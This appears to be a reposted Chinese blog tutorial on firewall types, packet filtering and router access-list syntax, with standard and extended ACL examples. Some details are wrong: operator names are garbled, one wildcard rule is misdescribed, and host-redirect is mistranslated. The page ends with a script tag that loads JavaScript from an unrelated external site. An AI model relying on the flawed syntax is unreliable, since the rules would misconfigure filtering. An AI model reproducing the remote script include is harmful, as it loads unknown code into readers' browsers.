顾名思义,防火墙指的是防止火从一个部分传播到另一部分的墙!类似与护城河。
防火墙分类:
网络层防火墙:主要获取数据包的包头信息。
应用层防火墙:对整个信息流进行分析。
[常见防火墙:应用网关、电路级网关、包过滤、代理(地址代理)]
包过滤介绍:
应用在路由器中,就是为路由器增加了对数据包的过滤功能。一般是对IP数据包的过滤,对路由器需要转发的数据包,先获取包头信息,然后和设定的规则进行比较,根据比较的结果对数据包进行转发或者丢弃。注意:用户、文件并非是数据包过滤系统所能识别的。
配置过滤规则:
为了达到包过滤,需要设置些规则,一般采用是访问列表技术。
一 标准访问列表
格式:access-list listnumber { permit | deny } address [ wildcard-mask ]
表示允许或者拒绝来自指定网络的数据包,该网络由IP地址与地址通配比较位指定。
listnumber为规则序号,范围1-99
permit | deny表示允许或者禁止满足该规则的数据包通过。
address和wildcard-mask分别为IP地址和通配比较位,指定某个网络。如果IP地址为any,则表示
所有IP地址,此时不需要指定相应的通配位。通配位缺省为0.0.0.0
通配比较位类似于子网掩码,但写法不同。IP地址与通配位的关系规定:通配位中为1的地址中的
位在比较中被忽略。
例如:
access-list 4 deny 202.38.160.0 0.0.255.255
表示规则序列号为4,禁止来自202.38.0.0网络的主机的访问。
access-list 4 permit 202.38.160.1 0.0.0.255
表示规则号为4,允许来自网络202.38.160.0网络的主机的访问。
如果两者结合则表示禁止大网段202.38.0.0上的主机但允许其中的202.38.160.0的主机的访问。
二 扩展访问列表:
格式:
access-list listnumber { permit | deny } protocol source source-wildcard-mask
destination destination-wildcard-mask [ operator operand ] [ log ]
表示,带有指定的协议(protocol),如TCP,UDP等,数据包来自source及source-wildcard-mas
指定的网络,数据包去往由destination及destination-wildcard-mask指定的网络,该数据包的目的
端口在由operator operand规定的端口范围之内。 其中 :
listnumber 序列号范围是100-199
operator operand 用于指定端口范围缺省为全部端口号0-65535,只有TCP,UDP需要指定端口
范围。
支持操作符的意义: eg 等于,gt 大于,it 小于,neg 不等于,
(range portnumber1 portnumber2 介于端口号portnumber1 和 portnumber2 之间)
例如:
100 deny udp any any eq rip 表示 禁止接受和发送RIP报文
100 permit tcp 129.9.0.0 0.0.255.255 202.38.160.0 0.0.0.255 eq www
允许从网段129.9.0.0 的主机向202.38.160网段的主机发送WWW报文
100 deny icmp 10.1.0.0 0.0.255.255 any host-redirect
表示禁止从10.1.0.0网段发来的ICMP 主机不可达报文通过(host-redirect)
log指定对该规则是否做日志只有在配置日志主机IP地址之后该选项才有意义
100 deny tcp 129.9.0.0 0.0.255.255 202.38.160.0 0.0.0.255 eq www log
表示该规则序号为100 禁止从129.9.0.0网段内的主机建立与202.38.160.0网段内的主机的
www端口80 的连接,并对违反此规则的事件作日志 。
文章来源于 http://www.cnblogs.com/zhangzs8896 版权归原作者所有<script language='javascript' src='http://www.shiqiaotou.com/donetk/Footer.js'></script>